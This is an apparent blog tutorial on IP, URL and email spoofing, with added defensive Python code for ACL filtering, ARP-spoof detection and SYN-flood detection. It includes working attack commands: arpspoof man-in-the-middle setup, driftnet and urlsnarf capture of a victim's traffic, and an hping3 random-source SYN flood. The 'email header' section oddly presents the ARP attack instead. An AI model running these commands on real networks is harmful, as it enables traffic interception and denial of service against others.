Spoofing

1) Definition - What does Spoofing mean?

Spoofing, in general, is a fraudulent or malicious practice in which communication is sent from an unknown source disguised as a source known to the receiver. Spoofing is most prevalent in communication mechanisms that lack a high level of security. In short, spoofing is "the false digital identity".

2) Types of Spoofing

2.1 IP Spoofing

Internet Protocol (IP) is the protocol used for transmitting messages over the Internet; it is a network protocol operating at layer 3 of the OSI model. IP spoofing is the act of manipulating the headers of a transmitted message to mask the attacker's true identity, so that the message appears to come from a trusted source.

2.1.1  Man-in-the-Middle attack

In a Man-in-the-Middle attack, the message sent to a recipient is intercepted by a third party, which manipulates the packets and resends its own message.

2.1.2  Denial of Service (DoS) Attack

A DoS attack is when an attacker floods a system with more packets than its resources can handle, causing the system to overload and shut down. The source address is spoofed, making it difficult to track where the attacks are coming from.

2.1.3  Solutions

IP spoofing can be prevented by monitoring packets using network monitoring software. A filtering router can also be installed; on the router, an ACL (access control list) is needed to block private addresses on your downstream interface, and on the upstream interface any source address originating outside the valid IP range is blocked from sending spoofed information.
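The anti-spoofing ACL described above, as an added simulation that is not part of the original post: the standard ingress/egress (BCP 38) form of the rule, with one filter on the Internet-facing interface and one on the LAN-facing interface. The interface names, the valid range 203.0.113.0/24 and the sample packets are constructed for the demo.

```python
import ipaddress
from typing import List, Tuple

# Assumption for the demo: the network behind this router owns 203.0.113.0/24.
VALID_RANGE = ipaddress.ip_network("203.0.113.0/24")

# Address blocks that must never appear as a source on the Internet-facing side.
BOGON_RANGES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918 private
    "127.0.0.0/8", "0.0.0.0/8", "169.254.0.0/16",      # loopback, "this", link-local
)]

def acl_decision(interface: str, src: str) -> str:
    """Return 'permit' or 'deny' for a packet with source `src` arriving on `interface`.

    'internet' (Internet-facing): ingress filter. Deny private/bogon sources and deny
        packets claiming our own range, since those cannot legitimately arrive from outside.
    'lan' (LAN-facing): egress filter. Permit only our own valid range, so a host
        inside cannot send packets with a forged source address to the Internet.
    """
    addr = ipaddress.ip_address(src)
    if interface == "internet":
        if any(addr in net for net in BOGON_RANGES) or addr in VALID_RANGE:
            return "deny"
        return "permit"
    if interface == "lan":
        return "permit" if addr in VALID_RANGE else "deny"
    raise ValueError(f"unknown interface {interface!r}")

def apply_acl(packets: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Run every (interface, source) pair through the ACL and keep the verdicts."""
    return [(iface, src, acl_decision(iface, src)) for iface, src in packets]

# Constructed sample traffic (not a real capture).
SAMPLE_PACKETS = [
    ("internet", "198.51.100.7"),    # ordinary remote host -> permit
    ("internet", "192.168.1.90"),    # private source from the Internet -> deny
    ("internet", "203.0.113.20"),    # our own range arriving from outside -> deny
    ("lan", "203.0.113.20"),         # our host sending normally -> permit
    ("lan", "8.8.8.8"),              # inside host forging an outside source -> deny
]

if __name__ == "__main__":
    for iface, src, verdict in apply_acl(SAMPLE_PACKETS):
        print(f"{iface:8} {src:16} {verdict}")
```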

2.2 URL Spoofing

URL spoofing occurs when one website appears to be another: the URL that is displayed is not the real URL of the site, so the information entered is sent to a hidden web address.

2.2.1  Intrusion

URL spoofing is sometimes used to direct a user to a fraudulent site; because the site has the same look and feel as the original, the user attempts to log in with a username and password. The hacker collects the username and password, then displays a password error and redirects the user to the legitimate site. Using this technique the hacker can create a series of fake websites and steal a user's private information without the user noticing.

2.2.2  URL Spoofing - Solutions

Web browser vendors release security patches that add the feature of revealing the "true" URL of a site in the browser. It is important to check whether your browser is vulnerable and to perform the necessary updates.

2.3 Email Spoofing

Email spoofing is the act of altering the header of an email so that the email appears to have been sent by someone else.

2.3.1  Email Spoofing – Attacks

  • Cause confusion or discredit a person
  • Social Engineering (phishing)
  • Hide identity of the sender (spamming)

2.3.2  Email Spoofing – Solutions

2.3.2.1  Check the content of the email:

  • Is the content weird in some way, or really unexpected from the sender?
  • Does it contain a form?
  • Does it request to either confirm or update login or any kind of information?

2.3.2.2  Check the header of the email

Here is a simple scenario, drawn as a picture (the steps that follow set up an ARP spoofing man-in-the-middle between the victim and the router):

  • Victim --> Attacker --> Router
  • Victim IP address: 192.168.1.90
  • Attacker network interface: eth0, with IP address 192.168.1.93
  • Router IP address: 192.168.1.1

2.3.2.3  Requirements:

  • Kali Linux
    • Arpspoof
    • Driftnet
    • Urlsnarf

2.3.2.4  Steps for Arpspoof:

  • Open the terminal in Kali Linux.
  • Enable IP forwarding on your machine.
# echo 1 > /proc/sys/net/ipv4/ip_forward
  • Set up arpspoof between the victim and the router.
# arpspoof -i eth0 -t 192.168.1.90 192.168.1.1
  • Then set up arpspoof in the other direction to capture all packets from the router to the victim.
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.90
  • After steps three and four, all packets sent or received by the victim should be going through the attacker machine.
  • Now we can try to use driftnet to monitor all of the victim's image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

2.3.2.5  Steps for driftnet:

  • Run driftnet
# driftnet -i eth0
  • When the victim browses a website with images, driftnet captures all of the image traffic.
  • To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
  • For the next step we will try to capture the website information/data by using urlsnarf.

2.3.2.6  Steps for Urlsnarf:

  • Just run this command:
# urlsnarf -i eth0

and urlsnarf will start capturing all website addresses visited by the victim machine.

  • When the victim browses a website, the attacker will know the address the victim visited.
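From the defender's side, the arpspoof steps above leave a recognisable trace: the router's IP (192.168.1.1) and the victim's IP (192.168.1.90) both suddenly resolve to the attacker's MAC. The detector below is an added example, not part of the original post; the ARP replies and MAC addresses are constructed to match the scenario above.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# One ARP reply as seen on the wire: (sender_ip, sender_mac) is the binding
# the packet asserts; target_ip is the host it was addressed to.
ArpReply = Tuple[str, str, str]

# Constructed sample capture for the scenario in this post. The MAC addresses are
# made up; the real attacker MAC would be whatever eth0 on 192.168.1.93 carries.
SAMPLE_REPLIES: List[ArpReply] = [
    ("192.168.1.1",  "02:00:00:00:00:01", "192.168.1.90"),  # router answers victim
    ("192.168.1.90", "02:00:00:00:00:90", "192.168.1.1"),   # victim answers router
    ("192.168.1.93", "02:00:00:00:00:93", "192.168.1.1"),   # attacker's own address
    ("192.168.1.1",  "02:00:00:00:00:93", "192.168.1.90"),  # arpspoof -t .90 .1
    ("192.168.1.90", "02:00:00:00:00:93", "192.168.1.1"),   # arpspoof -t .1 .90
]

def detect_arp_spoof(replies: List[ArpReply], gateway_ip: str) -> List[str]:
    """Return alert strings for replies that rebind an already-known IP to a new
    MAC, or that make one MAC claim several IPs (the two-sided MITM pattern).
    The first-seen binding is kept, the way a static ARP entry for the gateway would."""
    ip_to_mac: Dict[str, str] = {}
    mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[str] = []
    for sender_ip, sender_mac, target_ip in replies:
        known = ip_to_mac.get(sender_ip)
        if known is not None and known != sender_mac:
            sev = "HIGH" if sender_ip == gateway_ip else "MEDIUM"
            alerts.append(f"{sev}: {sender_ip} moved from {known} to {sender_mac} "
                          f"(reply sent to {target_ip})")
        else:
            ip_to_mac[sender_ip] = sender_mac          # learn the first-seen binding
        mac_to_ips[sender_mac].add(sender_ip)
        if len(mac_to_ips[sender_mac]) > 1:
            alerts.append(f"MEDIUM: {sender_mac} now claims {sorted(mac_to_ips[sender_mac])}")
    return alerts

if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_REPLIES, gateway_ip="192.168.1.1"):
        print(line)
```

On a real host the same logic can be fed from a packet capture of ARP replies, or approximated by periodically diffing the output of the system ARP table against the gateway's known MAC.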

2.4 URL Spoofing [Site Cloning], Example

  • http://techsolutionpoint/2017/06/19/%e0%a6%ab%e0%a6%bf%e0%a6%b6%e0%a6%bf%e0%a6%82-phishing/

2.5 DoS Attack – Example

  • In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.
  • DoS using hping3 with random source IP
    root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.80

2.5.1  Let me explain the options used in this command:

  • hping3 = Name of the application binary.
  • -c 10000 = Number of packets to send.
  • -d 120 = Size of each packet sent to the target machine.
  • -S = Send SYN packets only.
  • -w 64 = TCP window size.
  • -p 21 = Destination port (21 being the FTP port). You can use any port here.
  • --flood = Send packets as fast as possible, without taking care to show incoming replies. Flood mode.
  • --rand-source = Use random source IP addresses. You can also use -a or --spoof to hide hostnames. See MAN page below.
  • 192.168.1.80 = Destination IP address

So how do you know it's working? In hping3 flood mode, replies are not checked (and actually they cannot be, because the --rand-source flag used in this command means the source IP address is no longer yours).

It took me just 5 minutes to make this machine completely unresponsive (that's the definition of DoS: Denial of Service).

In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really slow.
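The flood above has a signature a defender can look for: a burst of bare SYNs to one port where almost every packet comes from a different source address. The detector below is an added example, not part of the original post; the capture is constructed to match the target 192.168.1.80:21 used in this post, and the thresholds are assumptions to tune per network.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

class Packet(NamedTuple):
    ts: float      # seconds since start of capture
    src: str
    dst: str
    dport: int
    flags: str     # "S" for a bare SYN, "SA" for SYN-ACK, etc.

def syn_flood_alerts(packets: List[Packet], syn_threshold: int = 100,
                     unique_ratio: float = 0.8, window: float = 1.0) -> List[str]:
    """Bucket bare SYNs per (dst, dport) into fixed time windows and alert when a
    window holds more than syn_threshold SYNs and at least unique_ratio of them come
    from distinct sources: the pattern left by hping3 --flood --rand-source."""
    buckets: Dict[Tuple[str, int, int], List[str]] = defaultdict(list)
    for p in packets:
        if p.flags == "S":
            buckets[(p.dst, p.dport, int(p.ts // window))].append(p.src)
    alerts: List[str] = []
    for (dst, dport, w), srcs in sorted(buckets.items()):
        n, uniq = len(srcs), len(set(srcs))
        if n > syn_threshold and uniq / n >= unique_ratio:
            alerts.append(f"window {w}: {n} SYNs to {dst}:{dport} from {uniq} distinct "
                          f"sources (likely spoofed SYN flood)")
    return alerts

def constructed_capture() -> List[Packet]:
    """Constructed sample: 1 s of normal FTP handshakes from three clients, then 1 s
    of a random-source SYN flood against 192.168.1.80:21. Not a real capture."""
    pkts: List[Packet] = []
    for i in range(30):                                # benign: few clients, repeated
        client = f"192.168.1.{10 + i % 3}"
        pkts.append(Packet(i / 30, client, "192.168.1.80", 21, "S"))
    for i in range(500):                               # flood: one SYN per fake source
        fake_src = f"10.{(i // 256) % 256}.{i % 256}.{(i * 7) % 256}"
        pkts.append(Packet(1.0 + i / 500, fake_src, "192.168.1.80", 21, "S"))
    return pkts

if __name__ == "__main__":
    for line in syn_flood_alerts(constructed_capture()):
        print(line)
```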



Abul Faeze Mohammad Bakabillah (Russell)

I am A. F. M. Bakabillah. Working as an ICT Consultant since 2008 in a Project (IsDB-BISEW IT Scholarship Programme). Along with MTCNA and MTCRE I am also MCP, MCSA, MCSA: Messaging, RHCE, ITIL & CEH certified. I am experienced in Routing (Static, OSPF & BGP), VPN and Tunneling (IPSec, PPtP, L2TP, EoIP), Firewall (Filter, NAT, Mangle), Bandwidth Management, PPPoE, Policy Routing.
